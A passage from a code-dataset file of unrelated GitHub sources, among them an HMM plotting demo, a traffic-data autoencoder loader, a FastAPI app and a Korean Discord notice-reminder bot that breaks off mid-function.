num_timesteps)\n plt.ylim(-0.25, 2.25)\n plt.xlabel(\"time\")\n plt.xlim(0, 100)\n\n plt.figure()\n plt.plot(lps)\n plt.axhline(hmm.marginal_log_prob(true_params, emissions, inputs), color='k', ls=':')\n plt.xlabel(\"EM iteration\")\n plt.ylabel(\"log joint probability\")\n\n plt.figure()\n plt.imshow(jnp.vstack((states[None, :], most_likely_states[None, :])),\n aspect=\"auto\", interpolation='none', cmap=\"Greys\")\n plt.yticks([0.0, 1.0], [\"$z$\", \"$\\hat{z}$\"])\n plt.xlabel(\"time\")\n plt.xlim(0, 500)\n\n\n print(\"true log prob: \", hmm.marginal_log_prob(true_params, emissions, inputs=inputs))\n print(\"test log prob: \", test_hmm.marginal_log_prob(params, emissions, inputs=inputs))\n\n plt.show()","repo_name":"probml/dynamax","sub_path":"dynamax/hidden_markov_model/demos/categorical_glm_hmm_demo.py","file_name":"categorical_glm_hmm_demo.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","stars":488,"dataset":"github-code","pt":"54"} +{"seq_id":"2030157912","text":"import json\nimport logging\nimport os\nimport random\nfrom typing import Tuple, Union, Any, Iterable, List\n\nimport numpy\nimport pandas\nfrom sklearn.preprocessing import MinMaxScaler\n\nfrom traffic_autoencoder import defaults\nfrom traffic_autoencoder.schemas import (\n Config,\n DataPreprocessing,\n ModelDefinition,\n FitParameters,\n ExperimentDefinition,\n)\n\nlogger = logging.getLogger(defaults.logger_name + \".\" + __name__)\n\n\nclass StreamToLogger(object):\n \"\"\"\n Fake file-like stream object that redirects writes to a logger instance.\n \"\"\"\n\n def __init__(self, logger, log_level=logging.INFO):\n self.logger = logger\n self.log_level = log_level\n self.linebuf = \"\"\n\n def write(self, buf):\n for line in buf.rstrip().splitlines():\n self.logger.log(self.log_level, line.rstrip())\n\n\ndef configure_logger(config: Config, verbose: bool) -> logging.Logger:\n \"\"\"\n Reads the logging config and returns a ready logger. This logger name is\n hardcoded and share in all project modules.\n :param config: general script configuration\n :param verbose: whether to give all details on the process execution\n :return: a configured logger instance\n \"\"\"\n\n logger = logging.getLogger(defaults.logger_name)\n logger.setLevel(logging.DEBUG)\n\n # sys.stdout = StreamToLogger(logger)\n # sys.stderr = StreamToLogger(logger, log_level=logging.ERROR)\n\n file_handler = logging.FileHandler(config.logging_path)\n file_level = logging.DEBUG\n file_handler.setLevel(file_level)\n formatter = logging.Formatter(\n \"%(asctime)s - %(name)s - %(levelname)s - %(message)s\"\n )\n file_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n\n if verbose:\n console_handler = logging.StreamHandler()\n console_handler.setLevel(logging.DEBUG)\n formatter = logging.Formatter(\n \"%(asctime)s - %(name)s - %(levelname)s - %(message)s\"\n )\n console_handler.setFormatter(formatter)\n logger.addHandler(console_handler)\n\n return logger\n\n\ndef load_dataset(\n dataset_path: str,\n preprocessing_parameters: DataPreprocessing,\n get_time_index: bool = False,\n) -> Union[Tuple[numpy.array, numpy.array], Tuple[numpy.array, numpy.array, Any]]:\n \"\"\"\n Terribly hardcoded loading function to load the traffic dataset. If you\n need to upload other data, by all means forget about this and build a\n function specific to your use case. Only requirement is that the output\n is completely ready for feeding straight into the model as properly\n dimensioned numpy arrays.\n\n :param dataset_path: the path where the file is.\n :param get_time_index: whether to include the time index in the output\n or not\n :param preprocessing_parameters: data object with the parameters for each\n specific loading\n :return: the data in the right dimensionality\n \"\"\"\n\n raw_dataset = pandas.read_csv(dataset_path, delimiter=\";\")\n\n # Merge date and hour into a proper datetime\n raw_dataset[\"str_uur\"] = raw_dataset[\"uur\"].astype(str)\n raw_dataset[\"str_uur\"] = raw_dataset[\"str_uur\"].apply(\n lambda hour: hour if len(hour) == 2 else \"0\" + hour\n )\n raw_dataset[\"interval_start_datetime\"] = pandas.to_datetime(\n raw_dataset[\"datum\"] + \" \" + raw_dataset[\"str_uur\"] + \":00:00\",\n format=\"%d/%m/%Y %H:%M:%S\",\n )\n\n # Merge camera name and way into a single ID\n raw_dataset[\"rijrichting\"] = raw_dataset[\"rijrichting\"].astype(str)\n\n raw_dataset[\"camera_id\"] = (\n raw_dataset[\"camera_naam\"] + \" - way \" + raw_dataset[\"rijrichting\"]\n )\n\n # Remove unnecesarry fields\n raw_dataset.drop(\n [\n \"datum\",\n \"str_uur\",\n \"uur\",\n \"camera_naam\",\n \"camera_kijkrichting\",\n \"rijrichting\",\n ],\n axis=1,\n inplace=True,\n )\n\n # Filter only camera ID's we are interested in\n if preprocessing_parameters.camera_method == \"all\":\n camera_selection = defaults.CAMERAS_OF_INTEREST\n elif preprocessing_parameters.camera_method == \"random\":\n camera_selection = random.sample(\n defaults.CAMERAS_OF_INTEREST, k=preprocessing_parameters.camera_count\n )\n elif preprocessing_parameters.camera_method == \"explicit_selection\":\n camera_selection = preprocessing_parameters.camera_selection\n else:\n raise ValueError(\n f\"Camera method {preprocessing_parameters.camera_method} is not a valid method\"\n )\n\n raw_dataset = raw_dataset[raw_dataset[\"camera_id\"].isin(camera_selection)]\n\n # Sort by time\n raw_dataset.sort_values(by=[\"interval_start_datetime\"])\n\n # Pivot cameras as columns\n # Missing values get counted as 0\n raw_dataset = raw_dataset.pivot_table(\n index=\"interval_start_datetime\",\n columns=\"camera_id\",\n values=\"intensiteit\",\n fill_value=0,\n )\n\n # Remove data out of time range\n raw_dataset = raw_dataset.loc[\n (raw_dataset.index > preprocessing_parameters.earliest)\n & (raw_dataset.index < preprocessing_parameters.latest)\n ]\n\n # Include forward and backward hours\n shaped_dataset = hour_grouper(\n raw_dataset,\n preprocessing_parameters.hours_backward,\n preprocessing_parameters.hours_forward,\n )\n\n # Extract time_index\n time_index = shaped_dataset.index\n\n # Build a scaler\n scaler = MinMaxScaler()\n scaler.fit(shaped_dataset.to_numpy())\n\n # Split into train and set\n train_dataset = shaped_dataset[\n shaped_dataset.index < preprocessing_parameters.split_datetime\n ]\n test_dataset = shaped_dataset[\n shaped_dataset.index >= preprocessing_parameters.split_datetime\n ]\n\n # Turn into numpy arrays with right dimensionality\n train_dataset = train_dataset.to_numpy()\n test_dataset = test_dataset.to_numpy()\n\n # Scale\n train_dataset = scaler.transform(train_dataset)\n test_dataset = scaler.transform(test_dataset)\n\n if get_time_index:\n return train_dataset, test_dataset, time_index\n return train_dataset, test_dataset\n\n\ndef hour_grouper(\n data: pandas.DataFrame, steps_backward: int = 1, steps_forward: int = 0\n):\n # Conceptually, going back in time one hour is unavoidable. Thus, the first\n # hour back is removed as it is unavoidably happening.\n steps_backward -= 1\n if steps_backward == 0 and steps_forward == 0:\n return data\n\n camera_column_names = data.columns.values\n\n data[\"central_time\"] = data.index\n\n for i in range(1, steps_backward + 1):\n data[f\"backward_{i}\"] = data[\"central_time\"] + pandas.Timedelta(hours=i)\n data = data.merge(\n right=data[[f\"backward_{i}\", *camera_column_names]],\n how=\"left\",\n left_on=\"central_time\",\n right_on=f\"backward_{i}\",\n suffixes=(\"\", f\"_back{i}\"),\n )\n data = data.drop([f\"backward_{i}\", f\"backward_{i}_back{i}\"], axis=1)\n\n for i in range(1, steps_forward + 1):\n data[f\"forward_{i}\"] = data[\"central_time\"] - pandas.Timedelta(hours=i)\n data = data.merge(\n right=data[[f\"forward_{i}\", *camera_column_names]],\n how=\"left\",\n left_on=\"central_time\",\n right_on=f\"forward_{i}\",\n suffixes=(\"\", f\"_forw{i}\"),\n )\n data = data.drop([f\"forward_{i}\", f\"forward_{i}_forw{i}\"], axis=1)\n\n data.index = data[\"central_time\"]\n data = data.drop([\"central_time\"], axis=1)\n\n data = data.dropna(axis=0)\n\n return data\n\n\ndef load_definitions(\n experiment_definitions_path: str,\n sections: Iterable[Union[ModelDefinition, FitParameters, DataPreprocessing]] = (\n ModelDefinition,\n FitParameters,\n DataPreprocessing,\n ),\n) -> List[ExperimentDefinition]:\n \"\"\"\n Reads all the experiment definitions in the path and returns them.\n\n :param experiment_definitions_path: the path where definitions are stored\n as JSON files.\n :param sections: which sections of the definition should be loaded\n :return: a list of experiment definitions\n \"\"\"\n\n definition_files_paths = os.listdir(experiment_definitions_path)\n\n definitions = []\n for definition_file_path in definition_files_paths:\n with open(\n os.path.join(experiment_definitions_path, definition_file_path), \"r\"\n ) as definition_file:\n definition_data = json.load(definition_file)\n\n model_definition = None\n if ModelDefinition in sections:\n model_data = definition_data[\"model\"]\n model_definition = ModelDefinition(\n input_shape=model_data[\"input_shape\"],\n layers=model_data[\"layers\"],\n encoded_size=model_data[\"encoded_size\"],\n activation=model_data[\"activation\"],\n final_activation=model_data[\"final_activation\"],\n loss_function=model_data[\"loss_function\"],\n optimizer=model_data[\"optimizer\"],\n learning_rate=model_data[\"learning_rate\"],\n )\n\n fit_parameters = None\n metrics = None\n if FitParameters in sections:\n fit_parameters_data = definition_data[\"fit_parameters\"]\n fit_parameters = FitParameters(\n batch_size=fit_parameters_data[\"batch_size\"],\n epochs=fit_parameters_data[\"epochs\"],\n )\n metrics = definition_data[\"metrics\"]\n\n data_preprocessing = None\n if DataPreprocessing in sections:\n data_preprocessing_data = definition_data[\"data_preprocessing\"]\n data_preprocessing = DataPreprocessing(\n earliest=data_preprocessing_data[\"earliest\"],\n latest=data_preprocessing_data[\"latest\"],\n split_datetime=data_preprocessing_data[\"split_datetime\"],\n cv_folds=data_preprocessing_data[\"cv_folds\"],\n test_size=data_preprocessing_data[\"test_size\"],\n hours_backward=data_preprocessing_data[\"hours_backward\"],\n hours_forward=data_preprocessing_data[\"hours_forward\"],\n camera_method=data_preprocessing_data[\"camera_method\"],\n camera_count=data_preprocessing_data[\"camera_count\"],\n camera_selection=data_preprocessing_data[\"camera_selection\"],\n )\n\n definition = ExperimentDefinition(\n model_definition=model_definition,\n metrics=metrics,\n fit_parameters=fit_parameters,\n data_preprocessing=data_preprocessing,\n )\n\n definitions.append(definition)\n\n return definitions\n","repo_name":"pmartincalvo/traffic-autoencoder","sub_path":"traffic_autoencoder/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10844,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"22909803411","text":"\"\"\"Main module for the FastAPI application.\"\"\"\n\nfrom fastapi import Depends, FastAPI, status\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom sqlalchemy.orm import Query, Session\n\nfrom src.helpers import get_db\nfrom src.models import Chapter\nfrom src.schemas import ChapterList\n\napp = FastAPI()\n\n# Add the CORS middleware\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\ndb = Depends(get_db)\n\n\n@app.get(\"/\", response_model=dict, status_code=status.HTTP_200_OK)\nasync def root() -> dict[str, str]:\n \"\"\"\n Root endpoint for the API.\n\n Returns\n -------\n dict: message\n\n Examples\n --------\n >>> root()\n {\"message\": \"Hello World\"}\n\n \"\"\"\n return {\"message\": \"Hello World\"}\n\n\n@app.get(\"/hello/{name}\", response_model=dict, status_code=status.HTTP_200_OK)\nasync def say_hello(name: str) -> dict[str, str]:\n \"\"\"\n Say hello to the user.\n\n Args:\n name: str\n name to say hello to\n\n Returns:\n dict: message\n\n Examples:\n >>> say_hello(\"John\")\n {\"message\": \"Hello John\"}\n \"\"\"\n return {\"message\": f\"Hello {name}\"}\n\n\n@app.get(\"/healthcheck\", status_code=status.HTTP_200_OK)\ndef healthcheck() -> dict[str, str]:\n \"\"\"\n Healthcheck endpoint for the API.\n\n Returns\n -------\n dict: status\n\n Examples\n --------\n >>> healthcheck()\n {\"status\": \"ok\"}\n \"\"\"\n return {\"status\": \"ok\"}\n\n\n@app.get(\n \"/chapters\",\n response_model=ChapterList,\n status_code=status.HTTP_200_OK,\n responses={\n status.HTTP_404_NOT_FOUND: {\n \"model\": ChapterList,\n \"description\": \"Chapters not found\",\n },\n },\n)\ndef get_chapters(db: Session = db) -> ChapterList:\n \"\"\"\n Get a list of chapters.\n\n Args:\n db: Session\n\n Returns:\n ChapterList: list of chapters\n\n Raises:\n HTTPException: if unable to retrieve chapters from the database\n\n Examples:\n >>> get_chapters()\n \"\"\"\n chapters: Query[type[Chapter]] = db.query(Chapter)\n\n chapters = [chapter.chapter_name for chapter in chapters]\n\n return ChapterList(chapters=chapters)\n","repo_name":"ShivamAmratlalPatel/ticket_app","sub_path":"backend/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22973817340","text":"from django.contrib import admin\nfrom .models import Config, hetong\n# Register your models here.\n\nclass hetongAdmin(admin.ModelAdmin):\n list_filter = ('bkgw','check_status',)\n list_display = ('zkzh','xm','xb','creater','bkgw','bscj','bspm')\n\nadmin.site.register(hetong, hetongAdmin)\n\nclass ConfigAdmin(admin.ModelAdmin):\n list_display = ('title','enable',)\n\nadmin.site.register(Config, ConfigAdmin)","repo_name":"xiangnanscu/djtest","sub_path":"jiangan/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36151452086","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Dec 2 14:10:17 2020\r\n\r\n@author: lockd\r\n\r\n ANAGRAMS LOGIC 1: Sum of all the ASCII characters is same for ANAGRAMS\r\nWorks even if the first letter of both the strings is capital.\r\n\r\n\"\"\"\r\n\r\ns1 = input(\"Enter the first string: \")\r\ns2 = input(\"Enter the second string: \")\r\n\r\nsum1 = 0\r\nfor i in s1:\r\n sum1 = sum1 + ord(i) \r\nprint(sum1)\r\n\r\n#With while loop\r\n\"\"\"\r\ni = 0\r\nwhile(i None:\n self.__ap = argparse.ArgumentParser(\n description=\"CLI for the Unstable Situation Generator\", add_help=True)\n for argument in self.ARGUMENTS:\n arg_params = self.ARGUMENTS[argument]\n self.__ap.add_argument(argument, **arg_params)\n \n def launch(self) -> None:\n ui_args = self.__ap.parse_args()\n if not ui_args.s or not ui_args.n:\n if not ui_args.checkpoint_load:\n raise TypeError(\"Must specify at least a checkpoint to load or YAML node and service configurations\")\n else:\n usg = UnstableSituationGenerator.load_checkpoint(ui_args.checkpoint_load)\n else:\n with open(ui_args.s, 'r') as in_services:\n services = yaml.safe_load(in_services)\n with open(ui_args.n, 'r') as in_nodes:\n nodes = yaml.safe_load(in_nodes)\n usg = UnstableSituationGenerator(services, nodes, ui_args.rng_seed)\n usg.generate_situation(ui_args.r, ui_args.o)\n if ui_args.checkpoint_save:\n usg.save_checkpoint(ui_args.checkpoint_save)\n\nif __name__ == '__main__':\n CommandUI().launch()\n","repo_name":"StickBrush/MistIaC","sub_path":"SituationGenerator/usg_ui.py","file_name":"usg_ui.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6130290878","text":"import pickle\r\n\r\nfilepath = 'score.bin'\r\n\r\ndef input_scores():\r\n s = []\r\n i = 1\r\n while True:\r\n n = int(input(f'#{i}? '))\r\n \r\n if n < 0:\r\n break\r\n s.append(n)\r\n i += 1\r\n return s\r\n\r\ndef get_average(s):\r\n total = 0\r\n for n in s:\r\n total += n\r\n return total / len(s)\r\n\r\ndef show_scores(s):\r\n for n in s:\r\n print(n, end=' ')\r\n print()\r\n\r\ndef save_data(scores, filepath):\r\n with open(filepath, 'wb') as file:\r\n pickle.dump(scores, file)\r\n\r\ndef load_data(filepath):\r\n with open(filepath, 'rb') as file:\r\n scores = pickle.load(file)\r\n return scores\r\n\r\n# Check if the file exists and load scores if it does\r\ntry:\r\n scores = load_data(filepath)\r\n print(\"[파일읽기]\")\r\n show_scores(scores)\r\n print(\"평균:\", get_average(scores))\r\nexcept FileNotFoundError:\r\n scores = input_scores()\r\n print(\"[점수 입력]\")\r\n save_data(scores, filepath)\r\n\r\nprint(\"[점수 출력]\")\r\nshow_scores(scores)\r\nprint(\"평균:\", get_average(scores))\r\n\r\n \r\n","repo_name":"songhj8304/hw","sub_path":"hw10.py","file_name":"hw10.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24096270880","text":"import discord\r\nimport asyncio\r\nimport datetime\r\nimport os\r\nimport string\r\nimport random\r\nimport sys\r\nimport time\r\nfrom discord.ext import commands\r\nprefix = \"&\"\r\nbot = commands.Bot(command_prefix=prefix)\r\n\r\nclient = discord.Client()\r\naccess_password = os.environ[\"ACCESS_PASSWORD\"]\r\ndeveloper_id = os.environ[\"DEVELOPER_ID\"]\r\nupdate_is = 0\r\nf = open('update.txt', 'w+t')\r\nf.write(str(update_is))\r\nf.close()\r\n\r\n@client.event\r\nasync def on_ready():\r\n print('Logged in as', client.user)\r\n print('( name =', client.user.name, ', id =', client.user.id, ')')\r\n\r\n activity = discord.Activity(name='Messages | &b help', type=discord.ActivityType.watching)\r\n await client.change_presence(activity=activity)\r\n\r\n\r\n@client.event\r\nasync def on_reaction_add(reaction, user):\r\n a = reaction.message.content.split(\"\\n\")\r\n b = a[0][10:]\r\n c = b.split(\" \")\r\n servername = c[0]\r\n noticeid = c[1]\r\n f = open(str(noticeid) + '-' + servername + '.txt', 'a+t')\r\n f.write(str(user.id) + ',')\r\n f.close()\r\n file = str(noticeid) + '-' + servername + '.txt'\r\n if os.path.isfile(file):\r\n f = open(str(noticeid) + '-' + servername + '.txt', 'rt')\r\n s = f.read()\r\n print(s)\r\n memberlist = s[:-1].split(\",\")\r\n f.close()\r\n memberlist = list(set(memberlist))\r\n print(memberlist)\r\n f = open(str(noticeid) + '-' + servername + '.txt', 'w+t')\r\n f.write(\",\".join(memberlist) + \",\")\r\n f.close()\r\n return\r\n\r\n\r\n\r\n@client.event\r\nasync def on_message(message):\r\n if message.content.startswith('&b'):\r\n f = open('update.txt', 'rt')\r\n update_is = f.read()\r\n f.close()\r\n if int(update_is) == 1 and not('&b finishupdate ' in message.content):\r\n await message.channel.send('업데이트 중인 관계로 명령어를 사용 하실 수 없습니다.')\r\n return\r\n\r\n if message.content == '&b help':\r\n now = datetime.datetime.now()\r\n\r\n #embed1 설정\r\n embed1 = discord.Embed(title=\"소개\", description=\"기획 : Bukgeuk\\n개발 : Bukgeuk\\n테스트 : Bukgeuk\\n버전 : v3.3\\nBukgeukBOT의 저작권은 개발자에게 있습니다.\", color=0xf9dddc)\r\n if now.hour > 12:\r\n embed1.set_footer(text = str(now.year) + \"년 \" + str(now.month) + \"월 \" + str(now.day) + \"일 | \" + \"오후 \" + str(now.hour-12) + \"시 \" + str(now.minute) + \"분 \" + str(now.second) + \"초\")\r\n else:\r\n embed1.set_footer(text = str(now.year) + \"년 \" + str(now.month) + \"월 \" + str(now.day) + \"일 | \" + \"오전 \" + str(now.hour) + \"시 \" + str(now.minute) + \"분 \" + str(now.second) + \"초\")\r\n\r\n #embed2 설정\r\n text = \"&b help : 도움말\\n&b addmember [서버 이름] [@유저] : 멤버 추가\\n&b viewmember [서버 이름] : 멤버 출력\\n&b notice [서버 이름] [공지 이름] [내용] : 공지 추가\\n&b noticesend [서버 이름] [공지 이름] : 공지 확인 안한 멤버에게 확인 메시지 전송\\n&b noticedelete [서버 이름] [공지 이름] : 공지 삭제\\n&b noticenow [서버 이름] : 진행중인 공지 출력\\n&b resetmember [서버 이름] : 멤버 초기화\\n&b deletemember [서버 이름] [@유저] : 멤버 삭제\\n\"\r\n text += \"&b viewreactionuser [서버 이름] [공지 이름] : 리액션한 유저 출력\\n&b addreactionuser [서버 이름] [공지 이름] [@유저] : 리액션 목록에 멤버 추가\\n&b deletereactionuser [서버 이름] [공지 이름] [@유저] : 리액션 목록에서 멤버 삭제\\n&b resetreactionuser [서버 이름] [공지 이름] : 리액션 목록 초기화\\n\"\r\n text += \"&b dmsend : 개인메시지로 메시지 전송\\n&b random [최소값] [최대값] : 랜덤으로 범위 내의 숫자 출력\\n&b startupdate [#채널] : 봇 업데이트 시작 공지\\n&b finishupdate [#채널] : 봇 업데이트 완료 공지\\n&b shutdown : BukgeukBOT 강제 종료\"\r\n embed2 = discord.Embed(title=\"명령어\", description=text, color=0xf9dddc)\r\n if now.hour > 12:\r\n embed2.set_footer(text = str(now.year) + \"년 \" + str(now.month) + \"월 \" + str(now.day) + \"일 | \" + \"오후 \" + str(now.hour-12) + \"시 \" + str(now.minute) + \"분 \" + str(now.second) + \"초\")\r\n else:\r\n embed2.set_footer(text = str(now.year) + \"년 \" + str(now.month) + \"월 \" + str(now.day) + \"일 | \" + \"오전 \" + str(now.hour) + \"시 \" + str(now.minute) + \"분 \" + str(now.second) + \"초\")\r\n\r\n #embed3 설정\r\n embed3 = discord.Embed(title=\"주의사항\", description=\"항목에 공백이 있으면 오류가 발생합니다\\nnotice 명령어를 사용할 때 '[내용]' 항목은 한 줄 내려서 입력해 주세요\\nresetreactionuser 명령어를 사용하시면 공지를 작성한 멤버도 리액션 목록에서 삭제됩니다.\", color=0xf9dddc)\r\n if now.hour > 12:\r\n embed3.set_footer(text = str(now.year) + \"년 \" + str(now.month) + \"월 \" + str(now.day) + \"일 | \" + \"오후 \" + str(now.hour-12) + \"시 \" + str(now.minute) + \"분 \" + str(now.second) + \"초\")\r\n else:\r\n embed3.set_footer(text = str(now.year) + \"년 \" + str(now.month) + \"월 \" + str(now.day) + \"일 | \" + \"오전 \" + str(now.hour) + \"시 \" + str(now.minute) + \"분 \" + str(now.second) + \"초\")\r\n #embed 출력\r\n await message.author.send('BukgeukBOT 도움말 입니다.', embed=embed1)\r\n await message.author.send('', embed=embed2)\r\n await message.author.send('', embed=embed3)\r\n await message.channel.send('개인 메시지로 도움말이 전송되었습니다.')\r\n return\r\n\r\n\r\n\r\n elif message.content == '&b dmsend':\r\n await message.channel.send('전송할 메시지를 입력해 주세요')\r\n try:\r\n def check(m):\r\n return m.author == message.author and m.channel == message.channel\r\n msg = await client.wait_for('message', check=check, timeout=15.0)\r\n except asyncio.TimeoutError:\r\n await message.channel.send('시간이 초과되었습니다.')\r\n return\r\n else:\r\n await message.author.send(msg.content)\r\n await message.channel.send('개인메시지로 전송되었습니다')\r\n return\r\n\r\n\r\n\r\n elif message.content.startswith('&b addmember '):\r\n if(0 == message.author.guild_permissions.administrator):\r\n await message.channel.send('이런, 권한이 부족하네요...')\r\n return\r\n after=message.content[13:]\r\n members = after.split(\" \")\r\n servername = members[0]\r\n f = open('memberlist-' + servername + '.txt', 'a+t')\r\n f.close()\r\n f = open('memberlist-' + servername + '.txt', 'rt')\r\n membertext = f.read()\r\n f.close()\r\n f = open('memberlist-' + servername + '.txt', 'a+t')\r\n if '<@' in members[1]:\r\n nm = members[1][2:-1]\r\n else:\r\n nm = members[1]\r\n if nm in membertext:\r\n await message.channel.send('이미 추가 되어 있는 멤버입니다.')\r\n return\r\n f.write(nm + ',')\r\n f.close()\r\n await message.channel.send('\"' + str(client.get_user(int(nm))) + '\" 멤버가 \"' + servername + '\" 서버에 정상적으로 추가되었습니다.')\r\n return\r\n\r\n\r\n\r\n elif message.content.startswith('&b viewmember '):\r\n if(0 == message.author.guild_permissions.administrator):\r\n await message.channel.send('이런, 권한이 부족하네요...')\r\n return\r\n servername = message.content[14:]\r\n file = 'memberlist-' + servername + '.txt'\r\n if os.path.isfile(file):\r\n f = open('memberlist-' + servername + '.txt', 'rt')\r\n s = f.read()\r\n memberlist = s.split(\",\")\r\n f.close()\r\n members = \"\"\r\n i = 0\r\n for m in memberlist:\r\n if i == len(memberlist) - 1:\r\n break\r\n members += str(client.get_user(int(m))) + '\\n'\r\n i += 1\r\n\r\n await message.channel.send('\"' + servername + '\" 서버의 멤버 목록 입니다.\\n' + '```\\n' + members + '\\n```')\r\n return\r\n else:\r\n await message.channel.send('\"' + servername + '\" 서버의 멤버 파일이 없습니다')\r\n return\r\n\r\n\r\n\r\n\r\n elif message.content.startswith('&b notice '):\r\n if(0 == message.author.guild_permissions.administrator):\r\n await message.channel.send('이런, 권한이 부족하네요...')\r\n return\r\n after = message.content.split(\"\\n\")\r\n abc = after[0][10:]\r\n last = abc.split(\" \")\r\n servername = last[0]\r\n noticeid = last[1]\r\n file = noticeid + '-' + servername + '.txt'\r\n if os.path.isfile(file):\r\n await message.channel.send('이미 진행중인 공지입니다.')\r\n else:\r\n f = open(str(noticeid) + '-' + servername + '.txt', 'a+t')\r\n f.write(str(message.author.id) + ',')\r\n f.close()\r\n delmsg = await message.channel.send('\"' + str(noticeid) + '\" 공지가 \"' + servername + '\" 서버에 정상적으로 추가 되었습니다.')\r\n await asyncio.sleep(3)\r\n await delmsg.delete()\r\n return\r\n\r\n\r\n\r\n elif message.content.startswith('&b noticesend '):\r\n if(0 == message.author.guild_permissions.administrator):\r\n await message.channel.send('이런, 권한이 부족하네요...')\r\n return\r\n a = message.content[14:]\r\n b = a.split(\" \")\r\n servername = b[0]\r\n noticeid = b[1]\r\n f = open('memberlist-' + servername + '.txt', 'rt')\r\n s = f.read()\r\n s = s[:-1]\r\n members = s.split(\",\")\r\n f.close()\r\n f = open(str(noticeid) + '-' + servername + '.txt', 'rt')\r\n s = f.read()\r\n s = s[:-1]\r\n reactionusers = s.split(\",\")\r\n f.close()\r\n for m in members:\r\n run = 0\r\n for ru in reactionusers:\r\n if run == len(reactionusers) - 1:\r\n if m == ru:\r\n break\r\n else:\r\n await client.get_user(int(m)).send('\"' + servername + '\" 서버의 \"' + noticeid + '\" 공지를 읽어 주시기 바랍니다.')\r\n await message.channel.send('\"' + str(client.get_user(int(m))) + '\" 님에게 전송을 완료하였습니다.')\r\n break\r\n else:\r\n if m == ru:\r\n break\r\n else:\r\n run = run + 1\r\n\r\n os.remove(str(noticeid) + '-' + servername + '.txt')\r\n await message.channel.send('전송을 완료하였습니다.')\r\n return\r\n\r\n\r\n\r\n elif message.content.startswith('&b noticedelete '):\r\n if(0 == message.author.guild_permissions.administrator):\r\n await message.channel.send('이런, 권한이 부족하네요...')\r\n return\r\n a = message.content[16:]\r\n b = a.split(\" \")\r\n servername = b[0]\r\n noticeid = b[1]\r\n file = noticeid + '-' + servername + '.txt'\r\n if os.path.isfile(file):\r\n os.remove(file)\r\n await message.channel.send('공지 파일 삭제에 성공했습니다!\\n공지는 직접 삭제해 주세요')\r\n return\r\n else:\r\n await message.channel.send('이런, 일치하는 공지가 없네요...')\r\n return\r\n\r\n\r\n\r\n elif message.content.startswith('&b noticenow '):\r\n if(0 == message.author.guild_permissions.administrator):\r\n await message.channel.send('이런, 권한이 부족하네요...')\r\n return\r\n servername = message.content[13:]\r\n path = \"./\"\r\n file_list = os.listdir(path)\r\n notices = \"\"\r\n for x in file_list:\r\n if 'memberlist' not in x:\r\n if servername in x:\r\n a = x[:-4]\r\n b = a.split(\"-\")\r\n notices += b[0] + '\\n'\r\n await message.channel.send('\"' + servername + '\" 서버에서 진행중인 공지 입니다.\\n' + '```\\n' + notices + '\\n```')\r\n return\r\n\r\n\r\n\r\n elif message.content.startswith('&b resetmember '):\r\n if(0 == message.author.guild_permissions.administrator):\r\n await message.channel.send('이런, 권한이 부족하네요...')\r\n return\r\n servername = message.content[15:]\r\n file = 'memberlist-' + servername + '.txt'\r\n if os.path.isfile(file):\r\n os.remove(file)\r\n await message.channel.send('멤버 파일 삭제에 성공했습니다!')\r\n return\r\n else:\r\n await message.channel.send('이런, 일치하는 파일이 없네요...')\r\n return\r\n\r\n\r\n\r\n elif message.content.startswith('&b deletemember '):\r\n if(0 == message.author.guild_permissions.administrator):\r\n await message.channel.send('이런, 권한이 부족하네요...')\r\n return\r\n a = message.content[16:]\r\n b = a.split(\" \")\r\n servername = b[0]\r\n tm = b[1]\r\n if '<@' in tm:\r\n nm = tm[2:-1]\r\n else:\r\n nm = tm\r\n\r\n file = 'memberlist-' + servername + '.txt'\r\n if os.path.isfile(file):\r\n f = open('memberlist-' + servername + '.txt', 'rt')\r\n s = f.read()\r\n members = s.split(\",\")\r\n f.close()\r\n try:\r\n members.remove(nm)\r\n f = open('memberlist-' + servername + '.txt', 'wt')\r\n f.write(\",\".join(members))\r\n f.close()\r\n await message.channel.send('\"' + str(client.get_user(int(nm))) + '\" 멤버를 삭제했습니다.')\r\n except ValueError:\r\n await message.channel.send('\"' + str(client.get_user(int(nm))) + '\" 멤버가 없습니다.')\r\n return\r\n else:\r\n await message.channel.send('멤버 파일이 없습니다.')\r\n return\r\n\r\n\r\n elif message.content.startswith('&b random '):\r\n a = message.content[10:]\r\n b = a.split(\" \")\r\n min = b[0]\r\n max = b[1]\r\n await message.channel.send('이번에 나온 숫자는 \"' + str(random.randrange(int(min), int(max) + 1)) + '\" 입니다!')\r\n return\r\n\r\n\r\n\r\n elif message.content.startswith('&b viewreactionuser '):\r\n a = message.content[20:]\r\n b = a.split(\" \")\r\n servername = b[0]\r\n noticeid = b[1]\r\n file = str(noticeid) + '-' + servername + '.txt'\r\n\r\n if os.path.isfile(file):\r\n f = open(str(noticeid) + '-' + servername + '.txt', 'rt')\r\n s = f.read()\r\n memberlist = s[:-1].split(\",\")\r\n f.close()\r\n memberlist = list(set(memberlist))\r\n members = \"\"\r\n i = 0\r\n for m in memberlist:\r\n if i == len(memberlist):\r\n break\r\n members += str(client.get_user(int(m))) + \"\\n\"\r\n i += 1\r\n\r\n await message.channel.send('\"' + servername + '\" 서버의 \"' + noticeid + '\" 공지에 리액션한 유저들 입니다.\\n' + '```\\n' + members + '\\n```')\r\n return\r\n else:\r\n await message.channel.send('이런, 일치하는 공지가 없네요...')\r\n return\r\n\r\n\r\n\r\n elif message.content.startswith('&b addreactionuser '):\r\n a = message.content[19:]\r\n b = a.split(\" 